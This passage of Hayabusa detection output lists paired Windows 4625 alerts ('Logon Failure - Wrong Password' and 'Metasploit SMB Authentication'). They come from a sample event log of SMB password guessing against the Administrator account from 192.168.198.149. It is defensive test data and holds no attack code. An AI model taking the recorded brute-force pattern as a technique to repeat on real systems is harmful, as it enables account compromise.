Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
